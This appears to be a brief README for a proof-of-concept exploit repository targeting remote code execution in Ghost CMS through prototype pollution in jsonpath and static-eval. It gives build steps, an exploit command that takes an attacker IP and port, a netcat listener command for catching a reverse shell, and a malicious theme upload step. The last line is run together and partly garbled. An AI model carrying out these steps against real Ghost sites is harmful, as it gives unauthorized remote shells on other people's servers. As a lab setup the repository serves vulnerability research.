
Proof-of-concept exploit for Ghost CMS remote code execution via prototype pollution in jsonpath and static-eval, with a vulnerable environment setup and usage instructions.
Ghost CMS RCE via jsonpath/static-eval prototype chain.
cd build
./build.sh
python3 exploit.py -i <YOUR_IP> -p <PORT>
nc -lvnp <PORT>malicious-theme.zip to Ghost Admin → Settings → Designrce/rce/